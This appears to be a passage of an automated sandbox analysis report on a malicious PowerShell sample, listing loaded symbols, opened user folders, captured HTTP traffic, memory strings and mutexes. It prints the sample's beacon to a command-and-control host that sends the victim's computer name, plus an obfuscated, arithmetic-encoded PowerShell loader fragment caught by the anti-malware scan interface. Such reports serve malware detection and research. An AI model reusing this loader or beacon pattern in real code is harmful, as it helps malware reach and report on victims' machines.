Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbicrosoft Irelandq source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: t.Automation.pdbdb@8 source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB761000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.137610309046.00000230FB280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB630000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137613990114.00000230FB7B3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps1 source: powershell.exe, 00000000.00000002.137612256906.00000230FB6E4000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA |
Source: global traffic | HTTP traffic detected: GET /tj9wps52g1htr.php?id=computer&key=19746202345&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cmacnnkfbhlcncm.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA8KQ9bx1gyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=ahrQ-LC_SZ7Of9mG7QXjZpf_wOZJr4vXrlJpizjuZKF4x-KbjlBwRL7HJdcSEEPVMU1W9Q0qnhPdxv1Irf-36GJQttOMPg9J89HVOoDhN01pxBTksREng5acfABjaoiIzXz-YtdMAGnC8TRJgie_snlItVmfDj8vOVrURqGydTvfhdPMX4PqJIT5BQ87_MMGq05uaA |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php? |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E442A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E5592000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E40C9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527p |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.137611950798.00000230FB500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E449E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvVoDyfLmk3ebYGs4fSwa7kJc5SKfazqapl2GCINOoUmaA |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZjNGI2VoLsGIjD67lPq7j91CFvV |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E3171000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E339B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzp# |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E53AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.137602284758.00000230F31E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.137610309046.00000230FB2F4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.137575649447.00000230E42B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E4299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.137575649447.00000230E42C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))((e8ldxb2uzitpq7hg3jkawmo496n " |